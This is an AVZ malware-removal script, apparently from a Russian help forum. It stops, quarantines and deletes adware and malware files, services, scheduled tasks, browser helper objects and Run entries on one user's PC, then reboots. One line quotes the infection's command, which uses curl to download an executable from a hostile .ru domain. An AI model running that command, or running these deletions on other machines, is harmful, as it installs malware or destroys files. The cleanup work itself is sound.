Код:
begin
TerminateProcessByName('c:\program files\c6365617902d5552bbdb08f17cc26c7e\76044d642946df609f05fb6f87d36959.exe');
TerminateProcessByName('C:\Windows\System32\icacl.exe');
TerminateProcessByName('c:\users\nara-2\appdata\local\mail.ru\mrkeeper.exe');
TerminateProcessByName('c:\program files (x86)\qyerbvxrhie\otrtnnxnaz.exe');
StopService('c6365617902d5552bbdb08f17cc26c7e');
StopService('icacl');
StopService('eb10d923b9aeff4bd5cd083bec2cadfb');
QuarantineFile('c:\program files\c6365617902d5552bbdb08f17cc26c7e\76044d642946df609f05fb6f87d36959.exe', '');
QuarantineFile('C:\Windows\System32\icacl.exe', '');
QuarantineFile('c:\users\nara-2\appdata\local\mail.ru\mrkeeper.exe', '');
QuarantineFile('c:\program files (x86)\qyerbvxrhie\otrtnnxnaz.exe', '');
QuarantineFile('C:\Users\Nara-2\AppData\LocalLow\SearchGo\searchgo.dll', '');
QuarantineFile('C:\Program Files (x86)\QYERbvxRHIE\kHRPnS1m.dll', '');
QuarantineFile('C:\Program Files (x86)\QYERbvxRHIE\f2HOY1b.dll', '');
QuarantineFile('C:\Users\Nara-2\AppData\Local\Temp\nsj8825.tmp\System.dll', '');
QuarantineFile('C:\Windows\system32\drivers\eb10d923b9aeff4bd5cd083bec2cadfb.sys', '');
QuarantineFile('C:\Users\Nara-2\AppData\Roaming\SIVApp\SIVApp.exe', '');
QuarantineFile('C:\Program Files\KNP Plugin\bin\knpPluginLogonTask.bat', '');
QuarantineFile('C:\Program Files (x86)\thzXuJvjU\ZzB5QsG.dll', '');
QuarantineFile('C:\Windows\27446c4dab8c80606a280e7753e862ff.ps1', '');
QuarantineFile('C:\Users\Nara-2\AppData\Roaming\curl\curl_7_54.exe -f -L http://amtomil.ru/f.exe -o C:\Users\Nara-2\AppData\Roaming\curl\curl.exe', '');
QuarantineFile('C:\Users\Nara-2\AppData\Roaming\curl\curl_7_54.exe', '');
QuarantineFile('C:\Users\Nara-2\AppData\Roaming\curl\curl.exe', '');
QuarantineFile('C:\Program Files (x86)\DllKitPRO\dllkitpro.exe', '');
QuarantineFile('C:\Users\Nara-2\AppData\Roaming\Microsoft\msi.exe', '');
QuarantineFile('C:\Users\Nara-2\AppData\Local\SearchGo\searchgo.exe', '');
QuarantineFile('C:\Program Files (x86)\GXZiGyYLSHyU2\j23eY1B.dll', '');
QuarantineFile('C:\Users\Nara-2\AppData\Local\wmipr\wmipr.exe', '');
QuarantineFile('C:\Users\Nara-2\AppData\Local\wupdate\wupdate.exe', '');
DeleteFile('C:\Windows\Tasks\uuxHwpnMkRCRpJh.job', '64');
DeleteFile('c:\program files\c6365617902d5552bbdb08f17cc26c7e\76044d642946df609f05fb6f87d36959.exe', '32');
DeleteFile('C:\Windows\System32\icacl.exe', '32');
DeleteFile('C:\Users\Nara-2\Favorites\Links\Интернет.url', '32');
DeleteFile('C:\Users\Nara-2\Desktop\Поиcк в Интeрнете.lnk', '32');
DeleteFile('C:\Users\Nara-2\Desktop\Вoйти в Интeрнет.lnk', '32');
DeleteFile('C:\Users\Nara-2\AppData\Local\Microsoft\Start Menu\Вoйти в Интeрнeт.lnk', '32');
DeleteFile('C:\Users\Nara-2\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Вoйти в Интeрнeт.lnk', '32');
DeleteFile('c:\users\nara-2\appdata\local\mail.ru\mrkeeper.exe', '32');
DeleteFile('c:\program files (x86)\qyerbvxrhie\otrtnnxnaz.exe', '32');
DeleteFile('C:\Users\Nara-2\AppData\LocalLow\SearchGo\searchgo.dll', '32');
DeleteFile('C:\Program Files (x86)\QYERbvxRHIE\kHRPnS1m.dll', '32');
DeleteFile('C:\Program Files (x86)\QYERbvxRHIE\f2HOY1b.dll', '32');
DeleteFile('C:\Users\Nara-2\AppData\Local\Temp\nsj8825.tmp\System.dll', '32');
DeleteFile('C:\Windows\system32\drivers\eb10d923b9aeff4bd5cd083bec2cadfb.sys', '32');
DeleteFile('C:\Users\Nara-2\AppData\Roaming\SIVApp\SIVApp.exe', '32');
DeleteFile('C:\Program Files\KNP Plugin\bin\knpPluginLogonTask.bat', '32');
DeleteFile('C:\Program Files (x86)\thzXuJvjU\ZzB5QsG.dll', '32');
DeleteFile('C:\Windows\27446c4dab8c80606a280e7753e862ff.ps1', '32');
DeleteFile('C:\Users\Nara-2\AppData\Roaming\curl\curl_7_54.exe', '32');
DeleteFile('C:\Users\Nara-2\AppData\Roaming\curl\curl.exe', '32');
DeleteFile('C:\Program Files (x86)\DllKitPRO\dllkitpro.exe', '32');
DeleteFile('C:\Users\Nara-2\AppData\Roaming\Microsoft\msi.exe', '32');
DeleteFile('C:\Users\Nara-2\AppData\Local\SearchGo\searchgo.exe', '32');
DeleteFile('C:\Program Files (x86)\GXZiGyYLSHyU2\j23eY1B.dll', '32');
DeleteFile('C:\Users\Nara-2\AppData\Local\wmipr\wmipr.exe', '32');
DeleteFile('C:\Users\Nara-2\AppData\Local\wupdate\wupdate.exe', '32');
DeleteFile('C:\Users\Nara-2\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mail.Ru.lnk');
DeleteService('c6365617902d5552bbdb08f17cc26c7e');
DeleteService('icacl');
DeleteService('eb10d923b9aeff4bd5cd083bec2cadfb');
DeleteFileMask('c:\program files\c6365617902d5552bbdb08f17cc26c7e', '*', true);
DeleteFileMask('c:\users\nara-2\appdata\local\mail.ru', '*', true);
DeleteFileMask('c:\program files (x86)\qyerbvxrhie', '*', true);
DeleteFileMask('c:\users\nara-2\appdata\locallow\searchgo', '*', true);
DeleteFileMask('c:\users\nara-2\appdata\roaming\sivapp', '*', true);
DeleteFileMask('c:\program files (x86)\thzxujvju', '*', true);
DeleteFileMask('c:\users\nara-2\appdata\roaming\curl', '*', true);
DeleteFileMask('c:\program files (x86)\dllkitpro', '*', true);
DeleteFileMask('c:\users\nara-2\appdata\local\searchgo', '*', true);
DeleteFileMask('c:\program files (x86)\gxzigyylshyu2', '*', true);
DeleteFileMask('c:\users\nara-2\appdata\local\wmipr', '*', true);
DeleteFileMask('c:\users\nara-2\appdata\local\wupdate', '*', true);
DeleteDirectory('c:\program files\c6365617902d5552bbdb08f17cc26c7e');
DeleteDirectory('c:\users\nara-2\appdata\local\mail.ru');
DeleteDirectory('c:\program files (x86)\qyerbvxrhie');
DeleteDirectory('c:\users\nara-2\appdata\locallow\searchgo');
DeleteDirectory('c:\users\nara-2\appdata\roaming\sivapp');
DeleteDirectory('c:\program files (x86)\thzxujvju');
DeleteDirectory('c:\users\nara-2\appdata\roaming\curl');
DeleteDirectory('c:\program files (x86)\dllkitpro');
DeleteDirectory('c:\users\nara-2\appdata\local\searchgo');
DeleteDirectory('c:\program files (x86)\gxzigyylshyu2');
DeleteDirectory('c:\users\nara-2\appdata\local\wmipr');
DeleteDirectory('c:\users\nara-2\appdata\local\wupdate');
DelBHO('{598AEFC6-DD3C-4A63-9AC3-53FCF6155931}');
DelBHO('{C0D38E5A-7CF8-4105-8FE8-31B81443A114}');
DelBHO('{2BC46CFA-4B00-4193-A7BD-6AD1D0BCB5BC}');
ExecuteFile('schtasks.exe', '/delete /TN "27446c4dab8c80606a280e7753e862ff" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "DllKitPRO" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "c6365617902d5552bbdb08f17cc26c7e" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "SearchGo Task" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "TnqpiRJoXWMCwN" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "uuxHwpnMkRCRpJh" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "uuxHwpnMkRCRpJh2" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "wmipr" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "wupdate" /F', 0, 15000, true);
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'SIVApp');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'kgfhfhxiii');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'KNPPlugin');
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
ExecuteRepair(3);
ExecuteWizard('SCU', 2, 2, true);
RebootWindows(true);
end.
Компьютер перезагрузится.